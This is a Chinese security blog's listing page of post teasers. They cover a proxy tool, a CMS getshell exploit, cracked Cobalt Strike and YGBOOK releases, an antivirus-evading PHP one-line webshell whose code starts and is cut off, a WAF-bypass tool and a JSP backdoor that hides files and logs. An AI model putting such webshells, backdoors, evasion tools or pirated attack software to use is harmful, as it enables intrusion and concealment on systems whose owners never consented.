体验盒子

关注网络安全,网络安全博客

Zan Proxy – 专业的代码调试HTTP代理服务器

Zan Proxy – 专业的代码调试HTTP代理服务器

Zan ProxyZan Proxy 是一个用Node.js编写的HTTP代理服务器,可用于修改请求地址和模拟响应数据。它同时也是一个自定义DNS解析和请求监控的工具。 该代理服务器有人性化的界面,简单易用。我们还为开发者提供...

Venator – macOS恶意活动检测工具

Venator – macOS恶意活动检测工具

VenatorVenator 是一个用于主动检测并收集macOS数据的 python 工具,获得数据后供分析哪些是恶意活动,macOS几乎很少有类似的工具。使用原生 macOS python 版本(2.7. x)开发,支持 High Sierra 和 Mojave。 ...

5iSNS内容付费系统组合漏洞getshell

5iSNS内容付费系统组合漏洞getshell

5iSNS内容付费系统系统涵盖文库、帖子等功能。知识付费结合社交网络,更快更好的适应互联网发展趋势。知识付费意味着人们对高质量知识内容的渴求,也是对知识的尊重,有迫切需要的人自然会乐于付费。社交网...

YGBOOK v6.14破解版,全自动小说采集程序

YGBOOK v6.14破解版,全自动小说采集程序

YGBOOK小说系统-小说采集系统YGBOOK基于ThinkPHP3.2.3开发,拥有全新设计的采集模式,数据入库,不再受目标站影响,是目前市面上最先进的小说采集系统。笔趣阁小说源码功能特色多节点采集拥有全...

CobaltStrike3.13 破解版

CobaltStrike3.13 破解版

CobaltStrike3.13 破解版破解记录关键文件位置aggressor/dialogs/ListenerDialog.class common/ArtifactUtils.class common/License.class server/ProfileEdits.class resources/xor.bin resources/...

一个免杀的PHP一句话木马

一个免杀的PHP一句话木马

一个可以绕过当前市面上几乎所有Webshell查杀的免杀PHP一句话木马脚本。<?php /** * Noticed: (PHP 5 >= 5.3.0, PHP 7) * */ $password = "uedbox.com"; $wx = substr($_SERVER["HTTP_REFERER"],-7,-4...

xwaf – 自动绕过waf工具

xwaf – 自动绕过waf工具

xwafxwaf是一个python3写的waf自动绕过工具,上一个版本是bypass_waf,xwaf相比bypass_waf更智能,可无人干预,可自动暴破过waf。代码流程图功能特点xwaf支持记忆,运行中断后下次继续运行时会在...

HideShell – JSP后门可隐藏文件隐藏日志

HideShell – JSP后门可隐藏文件隐藏日志

HideShell后门HideShell是一个JSP后门木马,除了访问日志之外,还可以在Tomcat下隐藏任意JSP文件(实现隐藏webshell),隐藏访问日志。hideshell.jsp隐藏的JSP在下次重新引导Tomcat实例之前保持accessbile。...

美国国防部发布《5G生态系统: 对美国国防部的风险与机遇》报告(全文翻译)

美国国防部发布《5G生态系统: 对美国国防部的风险与机遇》报告(全文翻译)

随着5G商用不断加速,美国对于争夺5G领先地位的焦虑感和紧迫感日益强烈。2019年4月3日,美国国防部国防创新委员会发布了《5G生态系统:对美国国防部的风险与机遇》(《THE 5G ECOSYSTEM: RISKS & OPPORTUNIT...

堡垒内部:一组亚利桑那州苹果数据中心的照片

堡垒内部:一组亚利桑那州苹果数据中心的照片

一家叫 Arizona Republic(亚利桑那共和报)的媒体获准进入苹果在美国亚利桑那州的数据中心拍照。基于保密安全问题,他们仅拍摄和发布了简单的一组照片。数据中心很低调谨慎,甚至在数据中心外部你都很难发...